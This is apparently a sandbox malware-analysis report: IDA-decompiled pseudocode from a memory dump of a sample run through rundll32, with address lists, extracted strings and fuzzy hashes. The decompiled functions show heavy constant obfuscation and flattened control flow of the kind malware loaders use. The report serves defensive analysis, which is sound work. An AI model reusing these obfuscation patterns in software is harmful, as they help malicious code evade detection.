										_push(_v356);
										_t603 = E0035C0C1( &_v128, __eflags,  &_v288, E00358606(_v492, 0x341610, __eflags),  &_v256, _v348, _v412, _v460, _t693, _t682 + _t693 - _t693, _v324) + _t693;
										E0034A8B0(_v400, _t572, _v376);
										_t694 =  &(_t694[0xd]);
										_t686 = 0xa9d081a;
										goto L12;
									}
								}
							}
						}
						goto L30;
						L28:
						__eflags = _t686 - 0x7bf1275;
					} while (__eflags != 0);
					L29:
					return _v300;
				}
			}

0x0035f435
0x0035f43f
0x0035f446
0x0035f44a
0x0035f455
0x0035f460
0x0035f46b
0x0035f473
0x0035f47b
0x0035f483
0x0035f48b
0x0035f496
0x0035f49e
0x0035f4a9
0x0035f4b4
0x0035f4bf
0x0035f4ca
0x0035f4d2
0x0035f4dd
0x0035f4e5
0x0035f4ed
0x0035f4f5
0x0035f4fd
0x0035f505
0x0035f50d
0x0035f512
0x0035f51e
0x0035f527
0x0035f52c
0x0035f532
0x0035f53a
0x0035f545
0x0035f550
0x0035f55b
0x0035f566
0x0035f571
0x0035f57c
0x0035f587
0x0035f592
0x0035f59a
0x0035f59f
0x0035f5a4
0x0035f5ac
0x0035f5b4
0x0035f5bf
0x0035f5c7
0x0035f5c8
0x0035f5cf
0x0035f5da
0x0035f5e5
0x0035f5f0
0x0035f5f8
0x0035f603
0x0035f60e
0x0035f619
0x0035f624
0x0035f62f
0x0035f63a
0x0035f64d
0x0035f654
0x0035f65f
0x0035f667
0x0035f675
0x0035f679
0x0035f681
0x0035f689
0x0035f69c
0x0035f6a3
0x0035f6ae
0x0035f6bb
0x0035f6c6
0x0035f6d1
0x0035f6dc
0x0035f6e7
0x0035f6f2
0x0035f6fa
0x0035f705
0x0035f710
0x0035f71b
0x0035f723
0x0035f72e
0x0035f739
0x0035f744
0x0035f74f
0x0035f757
0x0035f765
0x0035f76a
0x0035f76e
0x0035f776
0x0035f77e
0x0035f789
0x0035f793
0x0035f794
0x0035f79b
0x0035f7a6
0x0035f7b1
0x0035f7bc
0x0035f7c7
0x0035f7cf
0x0035f7df
0x0035f7e3
0x0035f7eb
0x0035f7f3
0x0035f7fb
0x0035f800
0x0035f808
0x0035f810
0x0035f818
0x0035f820
0x0035f825
0x0035f82d
0x0035f838
0x0035f840
0x0035f84b
0x0035f856
0x0035f86a
0x0035f871
0x0035f87c
0x0035f887
0x0035f88f
0x0035f897
0x0035f8a2
0x0035f8aa
0x0035f8b7
0x0035f8bb
0x0035f8c3
0x0035f8cb
0x0035f8d3
0x0035f8db
0x0035f8e3
0x0035f8e8
0x0035f8f0
0x0035f8fb
0x0035f903
0x0035f90e
0x0035f919
0x0035f921
0x0035f929
0x0035f930
0x0035f938
0x0035f940
0x0035f947
0x0035f94a
0x0035f94b
0x0035f94f
0x0035f954
0x0035f958
0x0035f960
0x0035f968
0x0035f973
0x0035f97e
0x0035f989
0x0035f99c
0x0035f9a3
0x0035f9ae
0x0035f9b9
0x0035f9c1
0x0035f9c6
0x0035f9ca
0x0035f9cf
0x0035f9d7
0x0035f9e4
0x0035f9e8
0x0035f9ed
0x0035f9f2
0x0035f9fa
0x0035fa05
0x0035fa10
0x0035fa1b
0x0035fa26
0x0035fa31
0x0035fa3c
0x0035fa47
0x0035fa52
0x0035fa5d
0x0035fa68
0x0035fa73
0x0035fa7b
0x0035fa8b
0x0035fa8f
0x0035fa97
0x0035faa7
0x0035faab
0x0035fab0
0x0035fab5
0x0035fabd
0x0035fac5
0x0035facd
0x0035fad2
0x0035fada
0x0035fae2
0x0035faea
0x0035faf2
0x0035fafa
0x0035fb05
0x0035fb0d
0x0035fb18
0x0035fb25
0x0035fb29
0x0035fb31
0x0035fb39
0x0035fb41
0x0035fb49
0x0035fb4e
0x0035fb5c
0x0035fb62
0x0035fb6a
0x0035fb79
0x0035fb7c
0x0035fb83
0x0035fb87
0x0035fb8c
0x0035fb94
0x0035fbaa
0x0035fbb1
0x0035fbb8
0x0035fbc3
0x0035fbd0
0x0035fbd1
0x0035fbda
0x0035fbde
0x0035fbe6
0x0035fbee
0x0035fc03
0x0035fc07
0x0035fc0f
0x0035fc17
0x0035fc24
0x0035fc28
0x0035fc30
0x0035fc35
0x0035fc3d
0x0035fc45
0x0035fc4a
0x0035fc52
0x0035fc5a
0x0035fc62
0x0035fc67
0x0035fc6f
0x0035fc74
0x0035fc7c
0x0035fc7c
0x0035fc7c
0x0035fc81
0x0035fc81
0x0035fc81
0x0035fc81
0x0035fc87
0x00000000
0x00000000
0x0035fc8d
0x0035ffc3
0x0035ffcc
0x0035ffd3
0x0036000b
0x0036001f
0x00360024
0x00360030
0x00360032
0x00000000
0x00360032
0x0035fc99
0x0035fdb2
0x0035fdc5
0x0035fdc6
0x0035fdcc
0x0035fdd4
0x0035fdd6
0x0035fddc
0x0035fde0
0x00000000
0x0035fde0
0x0035fca5
0x0035fd4c
0x0035fd55
0x0035fd60
0x0035fd75
0x0035fd76
0x0035fd77
0x0035fd78
0x0035fd8a
0x0035fd9c
0x0035fda1
0x0035fda4
0x0035fd0b
0x0035fd0b
0x0035fc7c
0x0035fc7c
0x0035fc7c
0x00000000
0x0035fc7c
0x0035fc7c
0x0035fcb1
0x0035fcb9
0x0035fcdd
0x0035fce2
0x0035fcea
0x0035fcfa
0x0035fcfb
0x0035fcfc
0x0035fcfe
0x0035fd03
0x0035fd08
0x0035fd08
0x00000000
0x0035fcbb
0x0035fcc1
0x00000000
0x0035fcc7
0x0035fcc7
0x00000000
0x0035fcc7
0x0035fcc1
0x0035ffc2
0x0035ffc2
0x0035ffc2
0x0035fd1b
0x0035fd2d
0x0035fd2e
0x0035fd2f
0x0035fd34
0x0035fd3d
0x0035fd3f
0x0035fd45
0x00000000
0x0035fd45
0x00000000
0x0035fd3f
0x0035fde8
0x0035fdee
0x0035ff6b
0x0035ff70
0x0035ff7e
0x0035ff8b
0x0035ff8c
0x0035ff8d
0x0035ff8f
0x0035ff94
0x0035ff98
0x0035ff9b
0x0035ffa0
0x00000000
0x0035fdf4
0x0035fdf4
0x0035fdfa
0x0035fede
0x0035fef5
0x0035fef7
0x0035ff00
0x0035ff02
0x0035ff04
0x0035ff06
0x0035ff0f
0x0035ff0f
0x0035ff11
0x0035ff13
0x0035ff15
0x0035ff18
0x0035ff18
0x0035ff18
0x0035ff2a
0x0035ff2f
0x0035ff3d
0x0035ff46
0x0035ff47
0x0035ff48
0x0035ff4a
0x0035ff4f
0x00000000
0x0035fe00
0x0035fe00
0x0035fe06
0x0035febe
0x0035fec3
0x0035fec7
0x0035feca
0x0035fecf
0x00000000
0x0035fe0c
0x0035fe0c
0x0035fe12
0x00360049
0x00000000
0x0036004f
0x0035fe18
0x0035fe1a
0x00000000
0x0035fe20
0x0035fe20
0x0035fe2c
0x0035fe30
0x0035fe37
0x0035fe9a
0x0035fe9d
0x0035fea2
0x0035fea5
0x00000000
0x0035fea5
0x0035fe1a
0x0035fe06
0x0035fdfa
0x00000000
0x0035ffa5
0x0035ffa5
0x0035ffa5
0x0035ffb1
0x00000000
0x0035ffb1

Strings

|%, xrefs: 0035F789
;r, xrefs: 0035FA1B
&e, xrefs: 0035F940
y8, xrefs: 0035F512
0{, xrefs: 0035FB39
:B8, xrefs: 0035F5BF
[h~, xrefs: 0035F9C1

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: :B8$;r$[h~$y8$|%$&e$0{
API String ID: 0-2624470838
Opcode ID: e1091b805e0ba25a786648a8f827ad4fb13d2e0a258357620dcbac8400597957
Instruction ID: 609083ecf517bdd19d9070612654ede2482ce9cf2d8f799ced6e0a8b1e06004a
Opcode Fuzzy Hash: e1091b805e0ba25a786648a8f827ad4fb13d2e0a258357620dcbac8400597957
Instruction Fuzzy Hash: F65231725093808FD3B9CF25C58AB8BFBE1BBC5348F10891DE5999A260D7B49949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0034D6D8 Relevance: 9.2, Strings: 7, Instructions: 408
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E0034D6D8(intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				char _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				signed int _v156;
				intOrPtr _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				void* __ecx;
				intOrPtr _t400;
				void* _t407;
				signed int _t410;
				intOrPtr _t421;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				intOrPtr _t434;
				void* _t473;
				intOrPtr* _t482;
				signed int _t485;
				signed int* _t491;
				void* _t493;

				_push(_a16);
				_push(_a12);
				_v16 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E003520B9(__edx);
				_v72 = 0xfd05e7;
				_t491 =  &(( &_v192)[6]);
				_v72 = _v72 | 0xfdc7c414;
				_v72 = _v72 ^ 0xfdffc5f6;
				_t489 = 0;
				_v128 = 0x159cf;
				_t421 = 0;
				_v128 = _v128 + 0x2543;
				_t485 = 0x8939926;
				_v128 = _v128 ^ 0xc1c453fb;
				_v128 = _v128 ^ 0xc1c52ce8;
				_v188 = 0xc0a375;
				_t423 = 0x5a;
				_v188 = _v188 / _t423;
				_v188 = _v188 + 0xf5e3;
				_v188 = _v188 + 0xffffba7d;
				_v188 = _v188 ^ 0x0002d452;
				_v192 = 0xeb0e91;
				_v192 = _v192 << 0xb;
				_v192 = _v192 >> 0xd;
				_v192 = _v192 | 0x4be38997;
				_v192 = _v192 ^ 0x4be25280;
				_v52 = 0x3397e5;
				_v52 = _v52 ^ 0x345a01ed;
				_v52 = _v52 ^ 0x346a35aa;
				_v60 = 0x140ff9;
				_t424 = 6;
				_v60 = _v60 / _t424;
				_v60 = _v60 ^ 0x000ad59a;
				_v168 = 0x6059cb;
				_t425 = 0x1a;
				_v168 = _v168 * 0x7f;
				_v168 = _v168 / _t425;
				_v168 = _v168 * 0x21;
				_v168 = _v168 ^ 0x3ca5e455;
				_v112 = 0x1e6ccd;
				_v112 = _v112 << 0xc;
				_v112 = _v112 + 0xffff3925;
				_v112 = _v112 ^ 0xe6c2746b;
				_v44 = 0xb8d15a;
				_v44 = _v44 >> 0xb;
				_v44 = _v44 ^ 0x0008fc1e;
				_v172 = 0x2478d;
				_v172 = _v172 ^ 0x68bbc6f8;
				_v172 = _v172 >> 0xc;
				_v172 = _v172 | 0x6f66efc5;
				_v172 = _v172 ^ 0x6f64ef75;
				_v116 = 0x51a99f;
				_v116 = _v116 | 0x1f129b6c;
				_v116 = _v116 ^ 0xc118cdce;
				_v116 = _v116 ^ 0xde47442a;
				_v132 = 0x216e1a;
				_v132 = _v132 + 0xffff43fb;
				_v132 = _v132 ^ 0x7008f7db;
				_v132 = _v132 ^ 0x702542ff;
				_v84 = 0xc91edc;
				_t426 = 0x5e;
				_v84 = _v84 / _t426;
				_v84 = _v84 ^ 0x0006a22a;
				_v164 = 0xa7de11;
				_v164 = _v164 + 0xffff6841;
				_v164 = _v164 >> 4;
				_v164 = _v164 << 3;
				_v164 = _v164 ^ 0x005f8816;
				_v108 = 0xdd6066;
				_v108 = _v108 >> 8;
				_v108 = _v108 << 8;
				_v108 = _v108 ^ 0x00d87344;
				_v92 = 0x21cc88;
				_v92 = _v92 ^ 0xd81b96af;
				_v92 = _v92 ^ 0xd8329727;
				_v96 = 0xbd6d4e;
				_t427 = 0x26;
				_v96 = _v96 / _t427;
				_v96 = _v96 ^ 0x00061825;
				_v24 = 0x6502ac;
				_v24 = _v24 << 4;
				_v24 = _v24 ^ 0x065de4e3;
				_v56 = 0x642336;
				_v56 = _v56 + 0xffffd3db;
				_v56 = _v56 ^ 0x006ffb84;
				_v68 = 0x348f1;
				_t428 = 0x55;
				_v68 = _v68 / _t428;
				_v68 = _v68 ^ 0x0008f449;
				_v76 = 0x3c74f1;
				_v76 = _v76 + 0xffff407e;
				_v76 = _v76 ^ 0x003b6445;
				_v88 = 0xc452b0;
				_v88 = _v88 + 0xffff3a6d;
				_v88 = _v88 ^ 0x00c8dd7a;
				_v48 = 0xc68c2;
				_t429 = 0x57;
				_v48 = _v48 / _t429;
				_v48 = _v48 ^ 0x0008f98a;
				_v100 = 0x631361;
				_v100 = _v100 | 0x5af5ab8e;
				_v100 = _v100 ^ 0x5affcbc5;
				_v148 = 0x1761a;
				_v148 = _v148 ^ 0xebf93349;
				_v148 = _v148 >> 4;
				_v148 = _v148 ^ 0x0eb625e6;
				_v40 = 0xe5378a;
				_v40 = _v40 >> 2;
				_v40 = _v40 ^ 0x003c8b43;
				_v140 = 0x73545;
				_t430 = 0x61;
				_v140 = _v140 * 0x21;
				_v140 = _v140 / _t430;
				_v140 = _v140 ^ 0x0002b6d6;
				_v80 = 0x39d04;
				_v80 = _v80 >> 4;
				_v80 = _v80 ^ 0x00009cd0;
				_v156 = 0x1ba0aa;
				_v156 = _v156 + 0x716e;
				_v156 = _v156 << 0xd;
				_v156 = _v156 ^ 0xb6bcbcaf;
				_v156 = _v156 ^ 0x34f57f5f;
				_v20 = 0xda4179;
				_t431 = 0x27;
				_t482 = _v16;
				_v20 = _v20 / _t431;
				_v20 = _v20 ^ 0x00092493;
				_v32 = 0x6dc25;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 ^ 0x0008149e;
				_v180 = 0x3ec4dc;
				_v180 = _v180 >> 5;
				_t432 = 0x70;
				_v180 = _v180 / _t432;
				_v180 = _v180 + 0xffff18e8;
				_v180 = _v180 ^ 0xfff4c632;
				_v64 = 0xea19a3;
				_v64 = _v64 | 0xee52e837;
				_v64 = _v64 ^ 0xeef909eb;
				_v28 = 0xcaf9fa;
				_v28 = _v28 >> 0xe;
				_v28 = _v28 ^ 0x000e6f4e;
				_v120 = 0x563e36;
				_v120 = _v120 >> 0xe;
				_v120 = _v120 << 5;
				_v120 = _v120 ^ 0x00027d23;
				_v176 = 0x87c40f;
				_v176 = _v176 ^ 0xb401f56c;
				_v176 = _v176 + 0xffff7429;
				_v176 = _v176 | 0xf3ec0d69;
				_v176 = _v176 ^ 0xf7eb47c6;
				_v184 = 0x47488d;
				_v184 = _v184 >> 0xf;
				_v184 = _v184 << 0xf;
				_v184 = _v184 << 1;
				_v184 = _v184 ^ 0x0086c0ad;
				_v136 = 0xb24629;
				_v136 = _v136 | 0x7ef33f67;
				_v136 = _v136 ^ 0x7ef17c1c;
				_v144 = 0xba01aa;
				_v144 = _v144 | 0x3cf3a1ff;
				_v144 = _v144 ^ 0x3cf83085;
				_v124 = 0xbe6d5e;
				_v124 = _v124 + 0xffff96e9;
				_v124 = _v124 | 0xcf3d3218;
				_v124 = _v124 ^ 0xcfb1306a;
				_v36 = 0xa69a94;
				_v36 = _v36 + 0xffffed5e;
				_v36 = _v36 ^ 0x00a0b8ce;
				_v104 = 0xa8033b;
				_t433 = 9;
				_v104 = _v104 / _t433;
				_v104 = _v104 >> 6;
				_v104 = _v104 ^ 0x0005e2c3;
				while(1) {
					L1:
					_t434 = _v160;
					while(1) {
						_t400 = _v152;
						while(1) {
							L3:
							_t493 = _t485 - 0xa1723c1;
							if(_t493 > 0) {
								goto L19;
							}
							L4:
							if(_t493 == 0) {
								E00358519(_v144, _v124, _t489);
								_t485 = 0x4b7559b;
								goto L17;
							} else {
								if(_t485 == 0x4b7559b) {
									return E00358519(_v36, _v104, _t421);
								}
								if(_t485 == 0x4ed616e) {
									_t441 = _v172;
									_t407 = E003516AF(_v172,  &_v12, _v116, _v132, _t434, _a8, _t421, _v84, _t434,  &_v4, _t434, _v164, _v108, _v92, _v96, _t434, _t434, _v24, _t434, _v56);
									_t491 =  &(_t491[0x12]);
									if(_t407 == 0) {
										L16:
										_t485 = 0xa1723c1;
										L17:
										_t400 = _v152;
									} else {
										_t410 = E0035D25E(_t441);
										_t485 = 0x9a40434;
										_t400 = _v12 * 0x2c + _t421;
										_v152 = _t400;
										_t482 =  >=  ? _t421 : (_t410 & 0x0000001f) * 0x2c + _t421;
									}
									_t434 = _v160;
									_t473 = 0x6a50b97;
									continue;
								} else {
									if(_t485 == _t473) {
										E00352007(_v72, _v40, _v140, _t434, _v80,  &_v8, _v156, _t434, _t489, _v20);
										_t485 =  !=  ? 0xd1a593f : 0xb29ddc7;
										_t400 = E00358F9E(_v32, _v180, _v64, _v28, _v160);
										_t491 =  &(_t491[0xb]);
										L30:
										_t473 = 0x6a50b97;
										goto L31;
									} else {
										if(_t485 == 0x8939926) {
											_t485 = 0xe60f9b1;
											continue;
										} else {
											if(_t485 != 0x9a40434) {
												L31:
												if(_t485 != 0x88fb243) {
													goto L1;
												}
											} else {
												_t434 = E003442C4(_v88, _a8, _v48, _v188,  *_t482, _v100, _v148);
												_t491 =  &(_t491[5]);
												_v160 = _t434;
												_t473 = 0x6a50b97;
												_t485 =  !=  ? 0x6a50b97 : 0xb29ddc7;
												_t400 = _v152;
												while(1) {
													L3:
													_t493 = _t485 - 0xa1723c1;
													if(_t493 > 0) {
														goto L19;
													}
													goto L4;
												}
												goto L19;
											}
										}
									}
								}
							}
							L34:
							return _t400;
							L19:
							if(_t485 == 0xaf524c8) {
								_push(_t434);
								_push(_t434);
								_t400 = E00347FF2(0x2000);
								_t489 = _t400;
								if(_t400 == 0) {
									_t485 = 0x4b7559b;
									goto L30;
								} else {
									_t485 = 0x4ed616e;
									goto L17;
								}
							} else {
								if(_t485 == 0xb29ddc7) {
									_t482 = _t482 + 0x2c;
									asm("sbb esi, esi");
									_t485 = (_t485 & 0xff8ce073) + 0xa1723c1;
									continue;
								} else {
									_t400 = 0xd1a593f;
									if(_t485 == 0xd1a593f) {
										E0034DF6F(_v120, _v176, _v128, _v16, _v184, _v136, _t489);
										_t491 =  &(_t491[5]);
										goto L16;
									} else {
										if(_t485 != 0xe60f9b1) {
											goto L31;
										} else {
											_push(_t434);
											_push(_t434);
											_t400 = E00347FF2(0x20000);
											_t421 = 0xd1a593f;
											if(0xd1a593f != 0) {
												_t485 = 0xaf524c8;
												goto L17;
											}
										}
									}
								}
							}
							goto L34;
						}
					}
				}
			}

0x0034d6e2
0x0034d6eb
0x0034d6f2
0x0034d6f9
0x0034d700
0x0034d707
0x0034d709
0x0034d70e
0x0034d719
0x0034d71c
0x0034d729
0x0034d734
0x0034d736
0x0034d73e
0x0034d740
0x0034d748
0x0034d74d
0x0034d755
0x0034d75d
0x0034d76b
0x0034d770
0x0034d776
0x0034d77e
0x0034d786
0x0034d78e
0x0034d796
0x0034d79b
0x0034d7a0
0x0034d7a8
0x0034d7b0
0x0034d7bb
0x0034d7c6
0x0034d7d1
0x0034d7e3
0x0034d7e8
0x0034d7f1
0x0034d7fc
0x0034d809
0x0034d80a
0x0034d814
0x0034d81d
0x0034d821
0x0034d829
0x0034d831
0x0034d836
0x0034d83e
0x0034d846
0x0034d851
0x0034d859
0x0034d864
0x0034d86c
0x0034d874
0x0034d879
0x0034d881
0x0034d889
0x0034d891
0x0034d899
0x0034d8a1
0x0034d8a9
0x0034d8b1
0x0034d8b9
0x0034d8c1
0x0034d8cb
0x0034d8d9
0x0034d8de
0x0034d8e7
0x0034d8f2
0x0034d8fa
0x0034d902
0x0034d907
0x0034d90c
0x0034d914
0x0034d91c
0x0034d921
0x0034d926
0x0034d92e
0x0034d936
0x0034d93e
0x0034d946
0x0034d952
0x0034d957
0x0034d95d
0x0034d965
0x0034d970
0x0034d978
0x0034d983
0x0034d98e
0x0034d999
0x0034d9a4
0x0034d9b6
0x0034d9bb
0x0034d9c4
0x0034d9cf
0x0034d9da
0x0034d9e5
0x0034d9f0
0x0034d9f8
0x0034da00
0x0034da08
0x0034da1a
0x0034da1f
0x0034da28
0x0034da33
0x0034da3b
0x0034da43
0x0034da4b
0x0034da53
0x0034da5b
0x0034da60
0x0034da68
0x0034da73
0x0034da7b
0x0034da86
0x0034da93
0x0034da94
0x0034da9e
0x0034daa2
0x0034daaa
0x0034dab5
0x0034dabd
0x0034dac8
0x0034dad0
0x0034dada
0x0034dadf
0x0034dae7
0x0034daef
0x0034db03
0x0034db08
0x0034db0f
0x0034db16
0x0034db21
0x0034db2c
0x0034db34
0x0034db3f
0x0034db47
0x0034db52
0x0034db57
0x0034db5b
0x0034db63
0x0034db6b
0x0034db76
0x0034db81
0x0034db8c
0x0034db97
0x0034db9f
0x0034dbaa
0x0034dbb2
0x0034dbb7
0x0034dbbc
0x0034dbc4
0x0034dbcc
0x0034dbd4
0x0034dbdc
0x0034dbe4
0x0034dbec
0x0034dbf4
0x0034dbf9
0x0034dbfe
0x0034dc02
0x0034dc0a
0x0034dc12
0x0034dc1a
0x0034dc22
0x0034dc2a
0x0034dc32
0x0034dc3a
0x0034dc42
0x0034dc4a
0x0034dc52
0x0034dc5a
0x0034dc65
0x0034dc70
0x0034dc7b
0x0034dc89
0x0034dc91
0x0034dc95
0x0034dc9a
0x0034dca2
0x0034dca2
0x0034dca2
0x0034dca6
0x0034dca6
0x0034dcaa
0x0034dcaa
0x0034dcaa
0x0034dcb0
0x00000000
0x00000000
0x0034dcb6
0x0034dcb6
0x0034de66
0x0034de6c
0x00000000
0x0034dcbc
0x0034dcc2
0x00000000
0x0034df63
0x0034dcce
0x0034de01
0x0034de05
0x0034de0a
0x0034de0f
0x0034de52
0x0034de52
0x0034de57
0x0034de57
0x0034de11
0x0034de1f
0x0034de27
0x0034de39
0x0034de3d
0x0034de41
0x0034de41
0x0034de44
0x0034de48
0x00000000
0x0034dcd4
0x0034dcd6
0x0034dd6a
0x0034dd91
0x0034dd9b
0x0034dda0
0x0034df40
0x0034df40
0x00000000
0x0034dcd8
0x0034dcde
0x0034dd31
0x00000000
0x0034dce0
0x0034dce6
0x0034df45
0x0034df4b
0x00000000
0x0034df4d
0x0034dcec
0x0034dd14
0x0034dd16
0x0034dd1b
0x0034dd24
0x0034dd29
0x0034dca6
0x0034dcaa
0x0034dcaa
0x0034dcaa
0x0034dcb0
0x00000000
0x00000000
0x00000000
0x0034dcb0
0x00000000
0x0034dcaa
0x0034dce6
0x0034dcde
0x0034dcd6
0x0034dcce
0x0034df6e
0x0034df6e
0x0034de73
0x0034de79
0x0034df22
0x0034df23
0x0034df24
0x0034df29
0x0034df2f
0x0034df3b
0x00000000
0x0034df31
0x0034df31
0x00000000
0x0034df31
0x0034de7f
0x0034de85
0x0034def6
0x0034defb
0x0034df03
0x00000000
0x0034de87
0x0034de87
0x0034de8e
0x0034dee9
0x0034deee
0x00000000
0x0034de90
0x0034de96
0x00000000
0x0034de9c
0x0034deb3
0x0034deb4
0x0034deb5
0x0034deba
0x0034dec0
0x0034dec6
0x00000000
0x0034dec6
0x0034dec0
0x0034de96
0x0034de8e
0x0034de85
0x00000000
0x0034de79
0x0034dcaa
0x0034dca6

Strings

6#d, xrefs: 0034D983
udo, xrefs: 0034D881
7R, xrefs: 0034DB76
6>V, xrefs: 0034DBAA
nq, xrefs: 0034DAD0
C%, xrefs: 0034D740
Ed;, xrefs: 0034D9E5

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 6#d$6>V$7R$C%$Ed;$nq$udo
API String ID: 0-652707834
Opcode ID: f1ebdc49b849bf8c904815538ebaa2ee5cbb6585970c67cf9760e8e328c8f8b3
Instruction ID: 0108ae3271789d27dbce6b222d5a514c15cc84d0662be61caf73fd454e0b2ca3
Opcode Fuzzy Hash: f1ebdc49b849bf8c904815538ebaa2ee5cbb6585970c67cf9760e8e328c8f8b3
Instruction Fuzzy Hash: 3512317250C3809FD369DF25C88AA9FBBE2BBC5344F10891DE5C98A260D7B19949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 003481B7 Relevance: 9.1, Strings: 7, Instructions: 349
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E003481B7() {
				void* _t347;
				signed int _t350;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t360;
				signed int _t364;
				void* _t374;
				intOrPtr _t407;
				signed int _t411;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int* _t422;
				void* _t426;

				 *(_t426 + 0x74) = 0xd212a7;
				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x52eac678;
				_t374 = 0xebf23c2;
				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x5238d4de;
				 *(_t426 + 0x20) = 0x60274e;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) >> 4;
				_t414 = 0x29;
				 *(_t426 + 0x34) =  *(_t426 + 0x20) / _t414;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) + 0x7a4c;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) ^ 0x00009fd0;
				 *(_t426 + 0x9c) = 0x5f71eb;
				 *(_t426 + 0x9c) =  *(_t426 + 0x9c) ^ 0x01156387;
				 *(_t426 + 0x9c) =  *(_t426 + 0x9c) ^ 0x014a126f;
				 *(_t426 + 0x1c) = 0x8735e4;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) >> 0xe;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 3;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) >> 4;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) ^ 0x000153b5;
				 *(_t426 + 0x58) = 0x9ed5c5;
				_t415 = 0x17;
				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) & 0x00000000;
				 *(_t426 + 0x54) =  *(_t426 + 0x58) * 0x5d;
				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0xb1e1bce9;
				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0x88583d56;
				 *(_t426 + 0x5c) = 0x8fe0dc;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) + 0xffff3edc;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) / _t415;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) ^ 0x00095c01;
				 *(_t426 + 0x48) = 0x18253c;
				 *(_t426 + 0x48) =  *(_t426 + 0x48) + 0xf9f1;
				 *(_t426 + 0x48) =  *(_t426 + 0x48) << 7;
				 *(_t426 + 0x48) =  *(_t426 + 0x48) ^ 0x0c842cab;
				 *(_t426 + 0x94) = 0x40d4a3;
				 *(_t426 + 0x94) =  *(_t426 + 0x94) << 5;
				 *(_t426 + 0x94) =  *(_t426 + 0x94) ^ 0x081e10bd;
				 *(_t426 + 0x20) = 0x8fc5ff;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) >> 4;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0x245daa70;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0xfc587561;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0xd80c07a2;
				 *(_t426 + 0x38) = 0x52431;
				 *(_t426 + 0x38) =  *(_t426 + 0x38) * 0x31;
				 *(_t426 + 0x38) =  *(_t426 + 0x38) ^ 0xfa9954a0;
				 *(_t426 + 0x38) =  *(_t426 + 0x38) + 0xffff6dd1;
				 *(_t426 + 0x38) =  *(_t426 + 0x38) ^ 0xfa6f2662;
				 *(_t426 + 0x44) = 0xc4652;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) + 0xffff61fe;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) >> 4;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) ^ 0x0000c191;
				 *(_t426 + 0x10) = 0x2c06e;
				 *(_t426 + 0x10) =  *(_t426 + 0x10) + 0xffffb3fc;
				 *(_t426 + 0x10) =  *(_t426 + 0x10) * 0x27;
				 *(_t426 + 0x10) =  *(_t426 + 0x10) + 0xbfb5;
				 *(_t426 + 0x10) =  *(_t426 + 0x10) ^ 0x00679be9;
				 *(_t426 + 0x7c) = 0xc3ec9d;
				 *(_t426 + 0x7c) =  *(_t426 + 0x7c) << 7;
				 *(_t426 + 0x7c) =  *(_t426 + 0x7c) ^ 0x61f5edc1;
				 *(_t426 + 0x70) = 0x3416d6;
				 *(_t426 + 0x70) =  *(_t426 + 0x70) << 3;
				 *(_t426 + 0x70) =  *(_t426 + 0x70) ^ 0x01aaf790;
